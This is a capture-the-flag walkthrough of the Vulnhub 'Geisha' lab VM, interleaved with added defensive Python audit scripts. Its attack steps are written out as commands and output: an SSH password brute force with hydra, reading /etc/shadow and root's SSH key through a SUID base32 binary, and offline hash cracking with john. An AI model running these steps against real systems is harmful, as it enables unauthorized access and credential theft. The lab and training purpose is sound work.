Vulnhub: Geisha VM detailed walkthrough

Geisha

Author: jason_huawen

Target information

Name: Geisha: 1

URL:

https://www.vulnhub.com/entry/geisha-1,481/

Identifying the target host IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:e2:ee:06      1      60  PCS Systemtechnik GmbH
 192.168.56.200  08:00:27:37:a2:18      1      60  PCS Systemtechnik GmbH

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.200.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.200 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 00:24 EST
Nmap scan report for bogon (192.168.56.200)
Host is up (0.00026s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
|   256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_  256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Geisha
|_http-server-header: Apache/2.4.38 (Debian)
7080/tcp open  ssl/http LiteSpeed httpd
|_http-title: Geisha
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-09T14:01:34
|_Not valid after:  2022-05-09T14:01:34
|_http-server-header: LiteSpeed
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
7125/tcp open  http     nginx 1.17.10
|_http-server-header: nginx/1.17.10
|_http-title: Geisha
8088/tcp open  http     LiteSpeed httpd
|_http-title: Geisha
|_http-server-header: LiteSpeed
9198/tcp open  http     SimpleHTTPServer 0.6 (Python 2.7.16)
|_http-title: Geisha
MAC Address: 08:00:27:37:A2:18 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.88 seconds

Getting a shell

Port 21

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ ftp 192.168.56.200
Connected to 192.168.56.200.
220 (vsFTPd 3.0.3)
Name (192.168.56.200:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ searchsploit vsFTPd 3.0.3                                  
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                     | multiple/remote/49719.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

  1. The target host does not allow anonymous FTP login.

  2. The FTP service has no usable exploit: the only searchsploit hit for vsftpd 3.0.3 is a remote denial of service.

Port 80

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ ls
image.jpeg  nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ steghide extract -sf image.jpeg     
Enter passphrase: 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ stegseek image.jpeg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.91% (133.3 MB)           
[!] error: Could not find a valid passphrase.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ nikto -h http://192.168.56.200       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.200
+ Target Hostname:    192.168.56.200
+ Target Port:        80
+ Start Time:         2023-02-23 00:41:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: b0, size: 5a53871e2297f, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-02-23 00:42:13 (GMT-5) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ gobuster dir -u http://192.168.56.200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.200
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/23 00:42:48 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 176]
/info.php             (Status: 200) [Size: 2]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102636 / 1102805 (99.98%)
===============================================================
2023/02/23 00:46:39 Finished
===============================================================

Port 7125

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ gobuster dir -u https://192.168.56.200:7125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh -k 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://192.168.56.200:7125
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/23 00:50:35 Starting gobuster in directory enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to https://192.168.56.200:7125/: Get "https://192.168.56.200:7125/": http: server gave HTTP response to HTTPS client

This run failed because of a mistake: port 7125 speaks plain HTTP, not HTTPS, so gobuster could not connect to the https:// URL.
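The nmap output above already says which web ports are TLS-wrapped ("ssl/http" on 7080) and which are plain "http" (80, 7125, 8088, 9198). The following Python script is an added example, not part of the original post: it parses the nmap -oN port table (sample constructed from the scan above) and builds a correctly-schemed base URL per HTTP-speaking port, so a later enumeration run never guesses the scheme.

```python
import re

# Constructed sample: the port table from the nmap -oN scan of 192.168.56.200 shown above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
7080/tcp open  ssl/http LiteSpeed httpd
7125/tcp open  http     nginx 1.17.10
8088/tcp open  http     LiteSpeed httpd
9198/tcp open  http     SimpleHTTPServer 0.6 (Python 2.7.16)
"""

# port/proto  state  service  [version ...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(text):
    """Return a list of (port, proto, state, service, version) tuples, one per port line."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append((int(port), proto, state, service, version or ""))
    return rows


def scheme_for(service):
    """Map nmap's service name to a URL scheme: 'ssl/http' (TLS-wrapped HTTP) -> https,
    plain 'http' (and variants such as 'http-alt') -> http, anything else -> None."""
    if service.startswith("ssl/") and "http" in service:
        return "https"
    if service == "https":
        return "https"
    if service == "http" or service.startswith("http-"):
        return "http"
    return None


def web_targets(host, text):
    """Build one correctly-schemed base URL per open HTTP-speaking TCP port."""
    urls = []
    for port, proto, state, service, _ in parse_ports(text):
        scheme = scheme_for(service)
        if proto != "tcp" or state != "open" or scheme is None:
            continue
        is_default = (scheme, port) in (("http", 80), ("https", 443))
        urls.append(f"{scheme}://{host}" + ("" if is_default else f":{port}"))
    return urls


if __name__ == "__main__":
    for url in web_targets("192.168.56.200", NMAP_OUTPUT):
        print(url)
```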

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ gobuster dir -u http://192.168.56.200:7125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.200:7125
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/23 01:08:15 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 175]
/shadow               (Status: 403) [Size: 154]
/passwd               (Status: 200) [Size: 1432]

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ curl http://192.168.56.200:7125/passwd    
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ curl http://192.168.56.200:7125/shadow
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.17.10</center>
</body>
</html>

Since geisha and root are the only accounts with a bash login shell, the next step is to brute-force the geisha SSH password with hydra:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.200
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-23 01:10:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.200:22/
[STATUS] 133.00 tries/min, 133 tries in 00:01h, 14344269 to do in 1797:32h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 14344126 to do in 2598:35h, 13 active
[22][ssh] host: 192.168.56.200   login: geisha   password: letmein
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-23 01:16:25

Hydra recovered the password of user geisha.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ ssh geisha@192.168.56.200       
The authenticity of host '192.168.56.200 (192.168.56.200)' can't be established.
ED25519 key fingerprint is SHA256:LWeIcL34FqnZ8TRLsknNndBBthrC1xzr/sHP5yQHMxE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.200' (ED25519) to the list of known hosts.
geisha@192.168.56.200's password: 
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May  9 11:56:59 2020 from 192.168.1.21
geisha@geisha:~$ id
uid=1000(geisha) gid=1000(geisha) groups=1000(geisha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
geisha@geisha:~$ sudo -l
[sudo] password for geisha: 
Sorry, user geisha may not run sudo on geisha.
geisha@geisha:~$ ls -alh
total 20K
drwxr-xr-x 2 geisha geisha 4.0K Feb 23 08:30 .
drwxr-xr-x 3 root   root   4.0K May  3  2020 ..
-rw-r--r-- 1 geisha geisha  220 May  3  2020 .bash_logout
-rw-r--r-- 1 geisha geisha 3.5K May  3  2020 .bashrc
-rw-r--r-- 1 geisha geisha  807 May  3  2020 .profile
geisha@geisha:~$ cd ..
geisha@geisha:/home$ ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K May  3  2020 .
drwxr-xr-x 18 root   root   4.0K May  3  2020 ..
drwxr-xr-x  2 geisha geisha 4.0K Feb 23 08:30 geisha
geisha@geisha:/home$ cd /var
geisha@geisha:/var$ ls -alh
total 48K
drwxr-xr-x 12 root root  4.0K May  9  2020 .
drwxr-xr-x 18 root root  4.0K May  3  2020 ..
drwxr-xr-x  2 root root  4.0K Feb 23 08:18 backups
drwxr-xr-x  9 root root  4.0K May  9  2020 cache
drwxr-xr-x 27 root root  4.0K May  9  2020 lib
drwxrwsr-x  2 root staff 4.0K Feb  1  2020 local
lrwxrwxrwx  1 root root     9 May  3  2020 lock -> /run/lock
drwxr-xr-x  7 root root  4.0K Feb 23 08:18 log
drwxrwsr-x  2 root mail  4.0K May  3  2020 mail
drwxr-xr-x  2 root root  4.0K May  3  2020 opt
lrwxrwxrwx  1 root root     4 May  3  2020 run -> /run
drwxr-xr-x  4 root root  4.0K May  3  2020 spool
drwxrwxrwt  4 root root  4.0K Feb 23 09:08 tmp
drwxr-xr-x  3 root root  4.0K May  9  2020 www
geisha@geisha:/var$ cd backups
geisha@geisha:/var/backups$ ls -alh
total 24K
drwxr-xr-x  2 root root 4.0K Feb 23 08:18 .
drwxr-xr-x 12 root root 4.0K May  9  2020 ..
-rw-r--r--  1 root root  11K May  9  2020 apt.extended_states.0
-rw-r--r--  1 root root   42 May  3  2020 apt.extended_states.1.gz
geisha@geisha:/var/backups$ cd ..
geisha@geisha:/var$ cd www
geisha@geisha:/var/www$ ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K May  9  2020 .
drwxr-xr-x 12 root root 4.0K May  9  2020 ..
drwxr-xr-x  2 root root 4.0K May  9  2020 html
geisha@geisha:/var/www$ cd html
geisha@geisha:/var/www/html$ ls -alh
total 220K
drwxr-xr-x 2 root root 4.0K May  9  2020 .
drwxr-xr-x 3 root root 4.0K May  9  2020 ..
-rw-r--r-- 1 root root 203K Jul  1  2019 image.png
-rw-r--r-- 1 root root  176 May  9  2020 index.html
-rw-r--r-- 1 root root    2 May  9  2020 info.php
geisha@geisha:/var/www/html$ cd /tmp
geisha@geisha:/tmp$ 

Privilege escalation

Upload linpeas.sh to /tmp on the target, make it executable, and run it:

═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 427K Jan 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 35K Jan 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 43K Feb 28  2019 /usr/bin/base32
-rwsr-xr-x 1 root root 154K Feb  2  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 51K Jan 10  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8


The linpeas.sh output shows that /usr/bin/base32 has the SUID bit set; since base32 reads any file given to it, this lets an unprivileged user read files as root and can be used to escalate privileges.
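A defender can catch this misconfiguration before an attacker does by diffing the host's set-uid binaries against the stock baseline. The following Python script is an added example, not code from the original post or from linpeas: it parses ls-style lines like the linpeas listing above (sample constructed from that listing) and reports root-owned set-uid/set-gid files outside an expected Debian 10 baseline, and scan_live() collects the same rows from a real filesystem.

```python
import os
import re
import stat

# Constructed sample: six lines taken from the linpeas SUID listing above.
LINPEAS_SUID = """\
-rwsr-xr-x 1 root root 427K Jan 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su
-rwsr-sr-x 1 root root 43K Feb 28  2019 /usr/bin/base32
-rwsr-xr-x 1 root root 154K Feb  2  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
"""

# Set-uid binaries a stock Debian 10 host is expected to carry (the root-owned
# entries of the linpeas listing above, minus base32). Anything else is suspect.
EXPECTED_SETID = {
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/bin/newgrp", "/usr/bin/passwd",
    "/usr/bin/umount", "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/sudo",
    "/usr/bin/gpasswd", "/usr/bin/chfn", "/usr/bin/mount",
}

# mode links owner group size month day year path [linpeas annotation]
LS_RE = re.compile(
    r"^(?P<mode>[-lds][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>/\S+)"
)


def parse_ls_lines(text):
    """Parse `ls -l` / linpeas style lines into dicts with path, owner and set-id flags."""
    rows = []
    for line in text.splitlines():
        m = LS_RE.match(line.strip())
        if not m:
            continue
        mode = m.group("mode")  # e.g. '-rwsr-sr-x': index 3 = set-uid, index 6 = set-gid
        rows.append({"path": m.group("path"), "owner": m.group("owner"),
                     "setuid": mode[3] in "sS", "setgid": mode[6] in "sS"})
    return rows


def unexpected_setid(rows, baseline=EXPECTED_SETID):
    """Root-owned set-uid/set-gid files that are not in the baseline, sorted by path."""
    return sorted(r["path"] for r in rows
                  if r["owner"] == "root" and (r["setuid"] or r["setgid"])
                  and r["path"] not in baseline)


def scan_live(root="/", skip=("/proc", "/sys", "/dev", "/run")):
    """Walk a live filesystem and return rows in the same shape as parse_ls_lines()."""
    rows = []
    for dirpath, dirnames, filenames in os.walk(root):
        # prune pseudo-filesystems before descending into them
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                rows.append({"path": path, "owner": "root" if st.st_uid == 0 else str(st.st_uid),
                             "setuid": bool(st.st_mode & stat.S_ISUID),
                             "setgid": bool(st.st_mode & stat.S_ISGID)})
    return rows


if __name__ == "__main__":
    print(unexpected_setid(parse_ls_lines(LINPEAS_SUID)))  # ['/usr/bin/base32']
```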

geisha@geisha:/tmp$ LFILE=/etc/shadow
geisha@geisha:/tmp$ /usr/bin/base32 "$LFILE" | base32 --decode
root:$6$p/n6gA9F6qb7..aD$d4YNXyKsg.Tam5AoDiOp0T9rWAMAkN55O9.BTyhyOacdXHgpTkpbE9nBe5R35oFzntg7prt3xfdSW9U9Ty1680:18391:0:99999:7:::
daemon:*:18385:0:99999:7:::
bin:*:18385:0:99999:7:::
sys:*:18385:0:99999:7:::
sync:*:18385:0:99999:7:::
games:*:18385:0:99999:7:::
man:*:18385:0:99999:7:::
lp:*:18385:0:99999:7:::
mail:*:18385:0:99999:7:::
news:*:18385:0:99999:7:::
uucp:*:18385:0:99999:7:::
proxy:*:18385:0:99999:7:::
www-data:*:18385:0:99999:7:::
backup:*:18385:0:99999:7:::
list:*:18385:0:99999:7:::
irc:*:18385:0:99999:7:::
gnats:*:18385:0:99999:7:::
nobody:*:18385:0:99999:7:::
_apt:*:18385:0:99999:7:::
systemd-timesync:*:18385:0:99999:7:::
systemd-network:*:18385:0:99999:7:::
systemd-resolve:*:18385:0:99999:7:::
messagebus:*:18385:0:99999:7:::
sshd:*:18385:0:99999:7:::
geisha:$6$T3Eaf.KNaM9VPSMw$J5gIF6yNaKpyEXW77KtMUqtra1aE5sfQvWis48mofoo1L2bpl6vmU5riEDTGrPl0CvdwzuZJMqIp.LIHatkjn.:18391:0:99999:7:::
systemd-coredump:!!:18385::::::
ftp:*:18391:0:99999:7:::

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ vim shadow1  
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ vim passwd1  
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ cat shadow1                
root:$6$p/n6gA9F6qb7..aD$d4YNXyKsg.Tam5AoDiOp0T9rWAMAkN55O9.BTyhyOacdXHgpTkpbE9nBe5R35oFzntg7prt3xfdSW9U9Ty1680:18391:0:99999:7:::
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ cat passwd1  
root:x:0:0:root:/root:/bin/bash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ unshadow passwd1 shadow1 > enc.txt       
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt enc.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA512"
Use the "--format=HMAC-SHA512" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:03:51 3.41% (ETA: 03:19:31) 0g/s 2452p/s 2452c/s 2452C/s whoabuddy..wh1tney
Session aborted

The root hash was not cracked, so the next attempt is to read root's SSH private key.
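Taken together, the passwd and shadow contents above tell a defender which accounts are exposed to exactly this kind of guessing (online over SSH, as with hydra, or offline against the hashes, as with john): the ones with an interactive shell and a real password hash. The following Python audit is an added example, not from the original post; the PASSWD and SHADOW samples are constructed from the files shown above with the hash bodies replaced by placeholders.

```python
# Constructed samples, abridged from the /etc/passwd and /etc/shadow contents above
# (the hash bodies are placeholders, not the real hashes).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
lsadm:x:998:1001::/:/sbin/nologin
"""
SHADOW = """\
root:$6$p/n6gA9F6qb7..aD$HASHBODYPLACEHOLDER:18391:0:99999:7:::
daemon:*:18385:0:99999:7:::
sync:*:18385:0:99999:7:::
www-data:*:18385:0:99999:7:::
geisha:$6$T3Eaf.KNaM9VPSMw$HASHBODYPLACEHOLDER:18391:0:99999:7:::
systemd-coredump:!!:18385::::::
"""

# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
# crypt(3) algorithm identifiers as they appear after the leading '$'.
ALGOS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
         "y": "yescrypt", "2b": "bcrypt", "2y": "bcrypt"}


def login_shells(passwd_text):
    """Names of accounts whose shell allows an interactive login, in file order."""
    names = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[6] not in NOLOGIN_SHELLS:
            names.append(f[0])
    return names


def classify_hash(field):
    """Classify one shadow password field: empty, locked, or a hash with algorithm and cost."""
    if field == "":
        return {"status": "empty", "algo": None, "rounds": None}
    if field.startswith(("!", "*")):
        return {"status": "locked", "algo": None, "rounds": None}
    parts = field.split("$")  # '$6$salt$hash' -> ['', '6', 'salt', 'hash']
    if len(parts) < 3 or parts[0] != "":
        return {"status": "unknown", "algo": None, "rounds": None}
    algo = ALGOS.get(parts[1], "unknown")
    # sha256crypt/sha512crypt default to 5000 rounds unless 'rounds=N' is given (john reported 5000 above)
    rounds = 5000 if algo in ("sha256crypt", "sha512crypt") else None
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
    return {"status": "hashed", "algo": algo, "rounds": rounds}


def parse_shadow(shadow_text):
    """Map account name -> classification of its shadow password field."""
    out = {}
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) >= 2:
            out[f[0]] = classify_hash(f[1])
    return out


def password_exposure(passwd_text, shadow_text):
    """Accounts that both permit interactive login and carry a real password hash,
    with the hash algorithm and cost: the set that password guessing can target."""
    shadow = parse_shadow(shadow_text)
    result = []
    for name in login_shells(passwd_text):
        info = shadow.get(name)
        if info and info["status"] == "hashed":
            result.append((name, info["algo"], info["rounds"]))
    return result
```

Locked service accounts and accounts without a login shell drop out of the report, which is what makes root and geisha the only two names left on this host.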

geisha@geisha:/tmp$ LFILE=/root/.ssh/id_rsa
geisha@geisha:/tmp$ /usr/bin/base32 "$LFILE" | base32 --decode
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

The SUID base32 binary successfully read root's private key. After saving it locally as id_rsa and tightening its file permissions, log in as root over SSH:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ ssh -i id_rsa root@192.168.56.200
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May  9 12:03:57 2020 from 192.168.1.21
root@geisha:~# id
uid=0(root) gid=0(root) groups=0(root)
root@geisha:~# ls -alh
total 32K
drwx------  4 root root 4.0K Feb 23 08:30 .
drwxr-xr-x 18 root root 4.0K May  3  2020 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
